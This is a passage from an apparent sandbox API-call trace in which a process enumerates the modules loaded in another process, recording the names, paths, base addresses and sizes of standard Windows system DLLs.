EntryPoint=0x0)) returned 1 [0067.126] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.126] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0067.127] CoTaskMemFree (pv=0xd910e0) [0067.127] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.127] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0067.128] CoTaskMemFree (pv=0xd910e0) [0067.128] GetModuleInformation (in: hProcess=0x214, hModule=0x77710000, lpmodinfo=0x24656f8, cb=0x18 | out: lpmodinfo=0x24656f8*(lpBaseOfDll=0x77710000, SizeOfImage=0x11f000, EntryPoint=0x77725340)) returned 1 [0067.128] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.128] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77710000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="kernel32.dll") returned 0xc [0067.129] CoTaskMemFree (pv=0xd910e0) [0067.129] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.129] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77710000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0067.129] CoTaskMemFree (pv=0xd910e0) [0067.129] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd910000, lpmodinfo=0x24678c8, cb=0x18 | out: lpmodinfo=0x24678c8*(lpBaseOfDll=0x7fefd910000, SizeOfImage=0x6c000, EntryPoint=0x7fefd912780)) returned 1 [0067.132] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.132] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd910000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0067.133] CoTaskMemFree (pv=0xd910e0) [0067.133] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.133] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd910000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\KERNELBASE.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")) returned 0x22 [0067.134] CoTaskMemFree (pv=0xd910e0) [0067.134] GetModuleInformation (in: hProcess=0x214, hModule=0x77610000, lpmodinfo=0x2469a98, cb=0x18 | out: lpmodinfo=0x2469a98*(lpBaseOfDll=0x77610000, SizeOfImage=0xfa000, EntryPoint=0x7762a2c8)) returned 1 [0067.134] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.134] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77610000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0067.135] CoTaskMemFree (pv=0xd910e0) [0067.135] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.135] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77610000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0067.136] CoTaskMemFree (pv=0xd910e0) [0067.136] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff1c0000, lpmodinfo=0x246bcb0, cb=0x18 | out: lpmodinfo=0x246bcb0*(lpBaseOfDll=0x7feff1c0000, SizeOfImage=0x67000, EntryPoint=0x7feff1cb03c)) returned 1 [0067.136] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.136] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff1c0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0067.137] CoTaskMemFree (pv=0xd910e0) [0067.137] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.137] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff1c0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\GDI32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")) returned 0x1d [0067.138] CoTaskMemFree (pv=0xd910e0) [0067.138] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff350000, lpmodinfo=0x246de70, cb=0x18 | out: lpmodinfo=0x246de70*(lpBaseOfDll=0x7feff350000, SizeOfImage=0xe000, EntryPoint=0x7feff351080)) returned 1 [0067.139] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.139] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff350000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="LPK.dll") returned 0x7 [0067.139] CoTaskMemFree (pv=0xd910e0) [0067.139] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.140] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff350000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\LPK.dll" (normalized: "c:\\windows\\system32\\lpk.dll")) returned 0x1b [0067.140] CoTaskMemFree (pv=0xd910e0) [0067.140] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff690000, lpmodinfo=0x2470020, cb=0x18 | out: lpmodinfo=0x2470020*(lpBaseOfDll=0x7feff690000, SizeOfImage=0xc9000, EntryPoint=0x7feff70a874)) returned 1 [0067.141] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.141] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff690000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="USP10.dll") returned 0x9 [0067.142] CoTaskMemFree (pv=0xd910e0) [0067.142] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.142] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff690000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USP10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")) returned 0x1d [0067.143] CoTaskMemFree (pv=0xd910e0) [0067.143] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff100000, lpmodinfo=0x24721e0, cb=0x18 | out: lpmodinfo=0x24721e0*(lpBaseOfDll=0x7feff100000, SizeOfImage=0x9f000, EntryPoint=0x7feff1025a0)) returned 1 [0067.143] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.143] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff100000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0067.144] CoTaskMemFree (pv=0xd910e0) [0067.144] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.144] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff100000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")) returned 0x1e [0067.145] CoTaskMemFree (pv=0xd910e0) [0067.145] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefdf90000, lpmodinfo=0x2474438, cb=0x18 | out: lpmodinfo=0x2474438*(lpBaseOfDll=0x7fefdf90000, SizeOfImage=0xd7000, EntryPoint=0x7fefdf93274)) returned 1 [0067.146] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.146] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefdf90000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="OLEAUT32.dll") returned 0xc [0067.147] CoTaskMemFree (pv=0xd910e0) [0067.147] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.147] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefdf90000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\OLEAUT32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")) returned 0x20 [0067.148] CoTaskMemFree (pv=0xd910e0) [0067.148] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff760000, lpmodinfo=0x2476608, cb=0x18 | out: lpmodinfo=0x2476608*(lpBaseOfDll=0x7feff760000, SizeOfImage=0x203000, EntryPoint=0x7feff783330)) returned 1 [0067.148] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.148] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff760000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0067.149] CoTaskMemFree (pv=0xd910e0) [0067.149] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.149] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff760000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0067.150] CoTaskMemFree (pv=0xd910e0) [0067.150] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefdb50000, lpmodinfo=0x24787c8, cb=0x18 | out: lpmodinfo=0x24787c8*(lpBaseOfDll=0x7fefdb50000, SizeOfImage=0x12d000, EntryPoint=0x7fefdb9ed50)) returned 1 [0067.151] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.151] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefdb50000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0067.152] CoTaskMemFree (pv=0xd910e0) [0067.152] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.152] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefdb50000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RPCRT4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")) returned 0x1e [0067.153] CoTaskMemFree (pv=0xd910e0) [0067.153] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff430000, lpmodinfo=0x247a988, cb=0x18 | out: lpmodinfo=0x247a988*(lpBaseOfDll=0x7feff430000, SizeOfImage=0xdb000, EntryPoint=0x7feff450760)) returned 1 [0067.154] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.154] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff430000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0067.155] CoTaskMemFree (pv=0xd910e0) [0067.155] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.155] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff430000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ADVAPI32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0067.156] CoTaskMemFree (pv=0xd910e0) [0067.156] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefee80000, lpmodinfo=0x247cb58, cb=0x18 | out: lpmodinfo=0x247cb58*(lpBaseOfDll=0x7fefee80000, SizeOfImage=0x1f000, EntryPoint=0x7fefee860e8)) returned 1 [0067.157] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.157] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefee80000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0067.159] CoTaskMemFree (pv=0xd910e0) [0067.159] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.159] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefee80000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")) returned 0x1f [0067.160] CoTaskMemFree (pv=0xd910e0) [0067.160] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef9bc0000, lpmodinfo=0x247ed18, cb=0x18 | out: lpmodinfo=0x247ed18*(lpBaseOfDll=0x7fef9bc0000, SizeOfImage=0xd3000, EntryPoint=0x7fef9c38b00)) returned 1 [0067.163] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.163] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef9bc0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="FastProx.dll") returned 0xc [0067.165] CoTaskMemFree (pv=0xd910e0) [0067.165] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.165] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef9bc0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\FastProx.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")) returned 0x25 [0067.166] CoTaskMemFree (pv=0xd910e0) [0067.166] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef9e20000, lpmodinfo=0x2480ef0, cb=0x18 | out: lpmodinfo=0x2480ef0*(lpBaseOfDll=0x7fef9e20000, SizeOfImage=0x77000, EntryPoint=0x7fef9e5e7f0)) returned 1 [0067.168] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.168] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef9e20000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wbemcomn2.DLL") returned 0xd [0067.170] CoTaskMemFree (pv=0xd910e0) [0067.170] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.170] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef9e20000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbemcomn2.DLL" (normalized: "c:\\windows\\system32\\wbemcomn2.dll")) returned 0x21 [0067.171] CoTaskMemFree (pv=0xd910e0) [0067.171] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd1e0000, lpmodinfo=0x24830c0, cb=0x18 | out: lpmodinfo=0x24830c0*(lpBaseOfDll=0x7fefd1e0000, SizeOfImage=0x22000, EntryPoint=0x7fefd1e5d30)) returned 1 [0067.173] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.173] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd1e0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="bcrypt.dll") returned 0xa [0067.175] CoTaskMemFree (pv=0xd910e0) [0067.175] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.175] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd1e0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")) returned 0x1e [0067.180] CoTaskMemFree (pv=0xd910e0) [0067.180] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff970000, lpmodinfo=0x24853b0, cb=0x18 | out: lpmodinfo=0x24853b0*(lpBaseOfDll=0x7feff970000, SizeOfImage=0x4d000, EntryPoint=0x7feff971070)) returned 1 [0067.181] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.181] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff970000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="WS2_32.dll") returned 0xa [0067.183] CoTaskMemFree (pv=0xd910e0) [0067.183] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.183] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff970000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WS2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")) returned 0x1e [0067.185] CoTaskMemFree (pv=0xd910e0) [0067.185] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff9c0000, lpmodinfo=0x2487570, cb=0x18 | out: lpmodinfo=0x2487570*(lpBaseOfDll=0x7feff9c0000, SizeOfImage=0x8000, EntryPoint=0x7feff9c1504)) returned 1 [0067.186] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.186] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff9c0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="NSI.dll") returned 0x7 [0067.188] CoTaskMemFree (pv=0xd910e0) [0067.188] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.188] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff9c0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NSI.dll" (normalized: "c:\\windows\\system32\\nsi.dll")) returned 0x1b [0067.190] CoTaskMemFree (pv=0xd910e0) [0067.190] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef9b90000, lpmodinfo=0x2489720, cb=0x18 | out: lpmodinfo=0x2489720*(lpBaseOfDll=0x7fef9b90000, SizeOfImage=0x27000, EntryPoint=0x7fef9b911a0)) returned 1 [0067.198] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.198] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef9b90000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="NTDSAPI.dll") returned 0xb [0067.200] CoTaskMemFree (pv=0xd910e0) [0067.200] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.200] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef9b90000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NTDSAPI.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll")) returned 0x1f [0067.202] CoTaskMemFree (pv=0xd910e0) [0067.202] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef95c0000, lpmodinfo=0x248b8e0, cb=0x18 | out: lpmodinfo=0x248b8e0*(lpBaseOfDll=0x7fef95c0000, SizeOfImage=0x12000, EntryPoint=0x7fef95c89d0)) returned 1 [0067.204] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.204] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef95c0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="NCObjAPI.DLL") returned 0xc [0067.206] CoTaskMemFree (pv=0xd910e0) [0067.206] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.206] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef95c0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NCObjAPI.DLL" (normalized: "c:\\windows\\system32\\ncobjapi.dll")) returned 0x20 [0067.208] CoTaskMemFree (pv=0xd910e0) [0067.208] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff400000, lpmodinfo=0x248dab0, cb=0x18 | out: lpmodinfo=0x248dab0*(lpBaseOfDll=0x7feff400000, SizeOfImage=0x2e000, EntryPoint=0x7feff401010)) returned 1 [0067.210] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.210] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff400000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0067.212] CoTaskMemFree (pv=0xd910e0) [0067.212] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.212] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff400000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\IMM32.DLL" (normalized: "c:\\windows\\system32\\imm32.dll")) returned 0x1d [0067.214] CoTaskMemFree (pv=0xd910e0) [0067.214] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff9d0000, lpmodinfo=0x248fc70, cb=0x18 | out: lpmodinfo=0x248fc70*(lpBaseOfDll=0x7feff9d0000, SizeOfImage=0x109000, EntryPoint=0x7feff9d1064)) returned 1 [0067.216] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.216] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff9d0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="MSCTF.dll") returned 0x9 [0067.218] CoTaskMemFree (pv=0xd910e0) [0067.218] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.218] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff9d0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSCTF.dll" (normalized: "c:\\windows\\system32\\msctf.dll")) returned 0x1d [0067.220] CoTaskMemFree (pv=0xd910e0) [0067.220] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd670000, lpmodinfo=0x2491e30, cb=0x18 | out: lpmodinfo=0x2491e30*(lpBaseOfDll=0x7fefd670000, SizeOfImage=0xf000, EntryPoint=0x7fefd671010)) returned 1 [0067.222] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.222] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd670000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0067.224] CoTaskMemFree (pv=0xd910e0) [0067.224] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.224] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd670000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTBASE.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")) returned 0x21 [0067.243] CoTaskMemFree (pv=0xd910e0) [0067.243] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb800000, lpmodinfo=0x2494000, cb=0x18 | out: lpmodinfo=0x2494000*(lpBaseOfDll=0x7fefb800000, SizeOfImage=0x2d000, EntryPoint=0x7fefb801010)) returned 1 [0067.245] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.245] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb800000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ntmarta.dll") returned 0xb [0067.247] CoTaskMemFree (pv=0xd910e0) [0067.247] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.247] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb800000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")) returned 0x1f [0067.249] CoTaskMemFree (pv=0xd910e0) [0067.249] GetModuleInformation (in: hProcess=0x214, hModule=0x7feffae0000, lpmodinfo=0x24961c0, cb=0x18 | out: lpmodinfo=0x24961c0*(lpBaseOfDll=0x7feffae0000, SizeOfImage=0x52000, EntryPoint=0x7feffae10d4)) returned 1 [0067.251] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.251] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feffae0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="WLDAP32.dll") returned 0xb [0067.254] CoTaskMemFree (pv=0xd910e0) [0067.254] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.254] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feffae0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WLDAP32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")) returned 0x1f [0067.256] CoTaskMemFree (pv=0xd910e0) [0067.256] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff360000, lpmodinfo=0x2498380, cb=0x18 | out: lpmodinfo=0x2498380*(lpBaseOfDll=0x7feff360000, SizeOfImage=0x99000, EntryPoint=0x7feff361c10)) returned 1 [0067.258] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.258] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff360000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="CLBCatQ.DLL") returned 0xb [0067.260] CoTaskMemFree (pv=0xd910e0) [0067.260] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.260] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff360000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CLBCatQ.DLL" (normalized: "c:\\windows\\system32\\clbcatq.dll")) returned 0x1f [0067.263] CoTaskMemFree (pv=0xd910e0) [0067.263] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef9b80000, lpmodinfo=0x249a540, cb=0x18 | out: lpmodinfo=0x249a540*(lpBaseOfDll=0x7fef9b80000, SizeOfImage=0xe000, EntryPoint=0x7fef9b85500)) returned 1 [0067.265] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.265] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef9b80000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wbemprox.dll") returned 0xc [0067.267] CoTaskMemFree (pv=0xd910e0) [0067.267] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.267] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef9b80000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")) returned 0x25 [0067.270] CoTaskMemFree (pv=0xd910e0) [0067.270] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd070000, lpmodinfo=0x249c718, cb=0x18 | out: lpmodinfo=0x249c718*(lpBaseOfDll=0x7fefd070000, SizeOfImage=0x18000, EntryPoint=0x7fefd073b48)) returned 1 [0067.272] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.272] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd070000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="CRYPTSP.dll") returned 0xb [0067.281] CoTaskMemFree (pv=0xd910e0) [0067.281] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.281] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd070000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTSP.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")) returned 0x1f [0067.283] CoTaskMemFree (pv=0xd910e0) [0067.283] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefcd70000, lpmodinfo=0x249e8d8, cb=0x18 | out: lpmodinfo=0x249e8d8*(lpBaseOfDll=0x7fefcd70000, SizeOfImage=0x47000, EntryPoint=0x7fefcd71064)) returned 1 [0067.289] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.289] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefcd70000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="rsaenh.dll") returned 0xa [0067.291] CoTaskMemFree (pv=0xd910e0) [0067.291] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.291] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefcd70000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")) returned 0x1e [0067.294] CoTaskMemFree (pv=0xd910e0) [0067.294] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd760000, lpmodinfo=0x24a0a98, cb=0x18 | out: lpmodinfo=0x24a0a98*(lpBaseOfDll=0x7fefd760000, SizeOfImage=0x14000, EntryPoint=0x7fefd7610e0)) returned 1 [0067.296] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.296] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd760000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="RpcRtRemote.dll") returned 0xf [0067.299] CoTaskMemFree (pv=0xd910e0) [0067.299] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.299] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd760000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")) returned 0x23 [0067.301] CoTaskMemFree (pv=0xd910e0) [0067.301] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef98a0000, lpmodinfo=0x24a2c68, cb=0x18 | out: lpmodinfo=0x24a2c68*(lpBaseOfDll=0x7fef98a0000, SizeOfImage=0x13000, EntryPoint=0x7fef98a1d80)) returned 1 [0067.304] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.304] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef98a0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wbemsvc.dll") returned 0xb [0067.306] CoTaskMemFree (pv=0xd910e0) [0067.306] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.306] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef98a0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")) returned 0x24 [0067.309] CoTaskMemFree (pv=0xd910e0) [0067.309] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef9780000, lpmodinfo=0x24a4e38, cb=0x18 | out: lpmodinfo=0x24a4e38*(lpBaseOfDll=0x7fef9780000, SizeOfImage=0x21000, EntryPoint=0x7fef97903b0)) returned 1 [0067.311] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.311] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef9780000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wmiutils.dll") returned 0xc [0067.314] CoTaskMemFree (pv=0xd910e0) [0067.314] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.314] GetModuleFileNameExW 